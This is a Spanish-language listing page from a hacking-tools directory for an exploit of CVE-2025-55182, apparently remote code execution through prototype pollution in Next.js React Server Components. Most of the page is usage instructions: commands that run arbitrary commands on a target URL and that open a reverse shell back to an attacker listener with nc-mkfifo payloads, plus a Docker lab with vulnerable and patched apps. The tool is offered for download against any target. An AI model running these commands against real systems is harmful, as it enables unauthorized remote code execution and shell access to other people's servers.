Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Exploit para CVE-2025-55182 que permite la ejecución remota de código mediante contaminación de prototipos en React Server Components de Next.js, con capacidades de ejecución de comandos y shell inversa. | Kitploit
Herramientas/GitHubGitHub/mr-destroyer/cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de PayloadsLabs y Práctica
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

Exploit para CVE-2025-55182 que permite la ejecución remota de código mediante contaminación de prototipos en React Server Components de Next.js, con capacidades de ejecución de comandos y shell inversa.

Ver Repositorio
hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE de Next.js React Server Components

Explota la CVE-2025-55182 para ejecución remota de código mediante contaminación de prototipos.

Instalación

root@kitploit:~
uv sync

Uso

Ejecución de comandos

root@kitploit:~
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

Shell inversa

root@kitploit:~
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

Opciones

  • -u, --url: URL/host a comprobar (obligatorio)
  • -c, --cmd: Comando a ejecutar
  • -r, --reverse: Habilita el modo de shell inversa
  • -l, --lhost: Host del listener para la shell inversa
  • -p, --lport: Puerto del listener para la shell inversa
  • -P, --payload: Tipo de payload de shell inversa: nc, nc-mkfifo, sh, perl (por defecto: nc)
  • --timeout: Tiempo de espera de la petición en segundos (por defecto: 10)
  • Ejemplos

    root@kitploit:~
    # Execute command
    python3 exploit.py -u https://example.com -c "whoami"
    
    # Reverse shell with nc-mkfifo (recommended for Alpine)
    python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
    

    Entorno de laboratorio

    El directorio lab/ contiene una configuración Docker completa para probar el exploit.

    Configuración

    root@kitploit:~
    cd lab
    docker-compose up -d
    

    Esto iniciará dos servicios:

    • vulnerable: Aplicación Next.js vulnerable en el puerto 3011
    • patched: Aplicación Next.js parcheada en el puerto 3012

    Pruebas

    root@kitploit:~
    # Test on vulnerable instance
    python3 exploit.py -u http://localhost:3011 -c "id"
    
    # Test reverse shell (get gateway IP first)
    GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
    python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
    
    Descargar herramienta